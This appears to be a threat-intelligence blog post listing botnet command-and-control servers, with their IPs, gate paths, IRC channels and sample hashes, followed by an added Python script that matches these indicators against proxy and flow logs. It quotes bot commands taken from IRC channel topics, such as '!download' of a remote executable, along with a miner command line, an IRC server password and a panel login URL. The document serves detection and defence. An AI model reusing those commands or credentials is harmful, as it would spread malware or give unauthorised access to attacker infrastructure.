Resolved kankarmz.ru to 37.221.170.35
Server: kankarmz.ru
Gate file: /Duf67/H8938_827.php
Alternate domains (both are currently unregistered):
u023sjasj.net
iodijsakj.net
This is one of only three or so betabots that I have seen rename the gate file from order.php to something less obvious. I guess that might be a bit too advanced for the average HF skid.
Hosting infos:
Read more...
xvident.pw (Andromeda HTTP botnet hosted by maxhosting.ru)
Resolved xvident.pw to 192.162.100.211
Server: xvident.pw
Gate file: gate.php
There is another domain pointed to the same IP which is also hosting an Andromeda panel.
Server: plesto.pw
Gate file: gate.php
Hosting infos: http://whois.domaintools.com/192.162.100.211
Related md5s (search on malwr.com to download samples):
Andromeda 57e8423ba1a1d8816ba5d078fd9f64df
yt4cpa.us (Andromeda HTTP botnet hosted by worldstream.nl)
Resolved yt4cpa.us to 217.23.11.122
Server: yt4cpa.us
Gate file: /gate.php
Downloaded by this betabot.
phpinfo here: http://yt4cpa.us/test.php
Hosting infos: http://whois.domaintools.com/217.23.11.122
Related md5s (search on malwr.com to download samples):
Andromeda b887cdbc60cdbaecd6702405b57dc0a1
spambox.su (snk Asper mod IRC botnet hosted by Cityline Ltd)
Resolved spambox.su to 95.215.70.66
Server: spambox.su
Port: 5050
Channel: #b600
Now talking on #b600
Topic for #b600 is: .j #sending
Topic for #b600 set by x (Sat Aug 10 05:38:20 2013)
Hosting infos: http://whois.domaintools.com/95.215.70.66
Related md5s (search on malwr.com to download samples):
Asper mod b1abf1aaa62115c53184e34190aa114e
thebankslife.no-ip.biz (Athena IRC botnet hosted by shellxnet.com)
Resolved thebankslife.no-ip.biz to 72.20.28.232
Server: thebankslife.no-ip.biz
Port: 6667
Channel     Users  Topic
#sexlyfe    2      [+nt]
#Syncrude   78     [+sntVCT] !download hxxp://nassau03.nl/russiabm.exe 5
#bankslife  35     [+nt] .gtfo
Channel: #Syncrude
Now talking on #Syncrude
Topic for #Syncrude is: !download hxxp://nassau03.nl/russiabm.exe 5
Topic for #Syncrude set by test (Fri Aug 09 00:17:01 2013)
Bitcoin mining info: "macromedia.exe" -a scrypt -o
Read more...
bitcoinglobalbanking.com (Betabot HTTP botnet hosted by leaseweb.com)
Resolved bitcoinglobalbanking.com to 82.192.92.5
Server: bitcoinglobalbanking.com
Gate file: /b/order.php
Alternate domain: bitcointradingdepot.com
This botnet wasn’t actually mining bitcoins when I checked it. I’m very surprised.
Hosting infos: http://whois.domaintools.com/82.192.92.5
Related md5s (search on malwr.com to download the samples):
Beta bot bbfdbd53810751401b720641687a6116
EDIT: It finally started bitcoin mining.
Mining infos: "macromedia.exe" -a scrypt -o http://mine.pool-x.eu:8080 -u jc2244.cr
Read more...
smokelessbooter.tk (Betabot HTTP botnet hosted by ecatel.net)
Resolved smokelessbooter.tk to 94.102.51.123
Server: smokelessbooter.tk
Gate file: /bronk/order.php
Alternate domains:
watchonlinecams.com
ssh-products.com
fudfiles.com
theprofitnet.com
1337hackers.com
cash-networks.com
We have a real HF hecker here folks. I can see a Java “driveby” site, shitty crypter site, shitty CPA network site and a shitty hackforums clone site just from the domain names. Looks like he’s running a shitty hosting company as well:
Read more...
bigtoys.pw (Betabot HTTP botnet hosted by namecheap.com)
Resolved bigtoys.pw to 198.187.28.72
Server: bigtoys.pw
Gate file: /b/order.php
Alternative domain: smalltoys.pw
I wonder who this could belong to?
Name Server: NS2.HOSTING-MARVID.ME
Name Server: NS1.HOSTING-MARVID.ME
An idiot, obviously.
Related md5s (search on malwr.com to download the samples):
Betabot: 2662af32e5d58d471bd16dc3202db284
Hosting infos: http://whois.domaintools.com/198.187.28.72
zbraaadanstfesse.org (Pony loader hosted by chicagovps.net)
Resolved zbraaadanstfesse.org to 172.245.5.137
Server: zbraaadanstfesse.org
Gate file: /p/stats.php
This is currently being downloaded by this citadel net. This is also a backup domain for a betabot, and is the domain currently used by it.
Betabot login: hxxp://zbraaadanstfesse.org/~.poto/login.php
Related md5s (search on malwr.com for samples):
7ec71449228f4209b9df59bb68ec3a5f
Hosting infos: http://whois.domaintools.com/172.245.5.137
x.fullhdizle.co (IRC botnet hosted by hostforweb.net)
Resolved x.fullhdizle.co to 216.246.77.143
Server: x.fullhdizle.co
Port: 1989
Server password: r00t33
Channel: #xxx
Channel password: r00t33
Topic for #xxx is: !open hxxp://www.fullhdizle.co
Topic for #xxx set by Coder at Wed Jun 26 14:02:37 2013
Related md5s (search on malwr.com to download the samples):
8cbdc21108b468ecd95644f18b83324d
Hosting infos: http://whois.domaintools.com/216.246.77.143
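The entries above are raw indicators; what a defender actually does with them is match them against egress logs. The block below is an added example (not code from the original blog) that folds the HTTP gate paths, C2 IPs and IRC server/port pairs listed on this page into a small matcher and runs it over constructed Squid-style proxy lines and a constructed flow record format. It goes slightly beyond the page: besides exact matches it flags any POST to a path ending in the default gate names (order.php, gate.php, stats.php) as a low-confidence hit, which is the generic Betabot/Andromeda/Pony pattern the first entry notes some operators rename. The log lines and the flow format are made up for illustration.

```python
"""Match the C2 indicators listed on this page against proxy and flow logs.

Added example, not part of the original post. Indicators are copied from the
entries above; the log lines are constructed for illustration.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# domain -> gate path, taken from the "Gate file" lines above
HTTP_GATES = {
    "kankarmz.ru": "/Duf67/H8938_827.php",
    "xvident.pw": "/gate.php",
    "plesto.pw": "/gate.php",
    "yt4cpa.us": "/gate.php",
    "bitcoinglobalbanking.com": "/b/order.php",
    "bitcointradingdepot.com": "/b/order.php",
    "smokelessbooter.tk": "/bronk/order.php",
    "bigtoys.pw": "/b/order.php",
    "smalltoys.pw": "/b/order.php",
    "zbraaadanstfesse.org": "/p/stats.php",
}
IRC_DOMAINS = {"spambox.su", "thebankslife.no-ip.biz", "x.fullhdizle.co"}
# (ip, port) pairs from the IRC entries above
IRC_SERVERS = {("95.215.70.66", 5050), ("72.20.28.232", 6667), ("216.246.77.143", 1989)}
C2_IPS = {"37.221.170.35", "192.162.100.211", "217.23.11.122", "82.192.92.5",
          "94.102.51.123", "198.187.28.72", "172.245.5.137"} | {ip for ip, _ in IRC_SERVERS}
KNOWN_HOSTS = set(HTTP_GATES) | IRC_DOMAINS | C2_IPS
# default gate names used by these families; a rename (entry 1) evades this heuristic
GENERIC_GATES = ("/order.php", "/gate.php", "/stats.php")

# Squid native access log: ts elapsed client code/status bytes method url ...
PROXY_RE = re.compile(r"^(?P<ts>\S+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)")
# Hypothetical flow format for this example: ts src:sport -> dst:dport
FLOW_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>[\d.]+):\d+\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)")


@dataclass(frozen=True)
class Hit:
    source: str      # "proxy" or "flow"
    line_no: int
    client: str
    kind: str        # gate | c2-host | irc-c2 | generic-gate
    indicator: str
    confidence: str  # high | medium | low


def classify_request(method, url):
    """Return (kind, indicator, confidence) for one HTTP request, or None."""
    u = urlparse(url)
    host = (u.hostname or "").lower()
    path = u.path or "/"
    gate = HTTP_GATES.get(host)
    if gate is not None and path == gate:
        return ("gate", host + path, "high")          # exact bot check-in
    if host in KNOWN_HOSTS:
        return ("c2-host", host, "medium")            # other traffic to a listed C2
    if method.upper() == "POST" and path.endswith(GENERIC_GATES):
        return ("generic-gate", host + path, "low")   # default gate name on an unknown host
    return None


def scan_proxy(text):
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = PROXY_RE.match(line)
        if not m:
            continue
        r = classify_request(m["method"], m["url"])
        if r:
            hits.append(Hit("proxy", n, m["client"], *r))
    return hits


def scan_flows(text):
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = FLOW_RE.match(line)
        if not m:
            continue
        dst, dport = m["dst"], int(m["dport"])
        if (dst, dport) in IRC_SERVERS:
            hits.append(Hit("flow", n, m["src"], "irc-c2", f"{dst}:{dport}", "high"))
        elif dst in C2_IPS:
            hits.append(Hit("flow", n, m["src"], "c2-host", dst, "medium"))
    return hits


# Constructed sample input (not real traffic)
PROXY_LOG = """\
1376100001.123 210 10.0.0.5 TCP_MISS/200 512 POST http://bigtoys.pw/b/order.php - DIRECT/198.187.28.72 text/html
1376100002.456 180 10.0.0.5 TCP_MISS/200 8192 GET http://example.org/index.html - DIRECT/93.184.216.34 text/html
1376100003.789 95 10.0.0.7 TCP_MISS/200 96 POST http://unknownhost.example/panel/gate.php - DIRECT/203.0.113.9 text/html
1376100004.000 40 10.0.0.9 TCP_MISS/200 64 GET http://yt4cpa.us/test.php - DIRECT/217.23.11.122 text/html
"""
FLOW_LOG = """\
1376100005 10.0.0.11:49152 -> 72.20.28.232:6667
1376100006 10.0.0.11:49153 -> 93.184.216.34:443
1376100007 10.0.0.12:49154 -> 216.246.77.143:1989
"""

if __name__ == "__main__":
    for h in scan_proxy(PROXY_LOG) + scan_flows(FLOW_LOG):
        print(h)
```

The three confidence tiers matter in practice: a POST to the exact gate path is a check-in and worth an immediate host isolation, traffic to a listed domain on some other path (the phpinfo page on yt4cpa.us, say) may be an analyst or a crawler, and the generic gate-name heuristic will fire on plenty of legitimate shop software, so it belongs in a hunting query rather than a blocking rule.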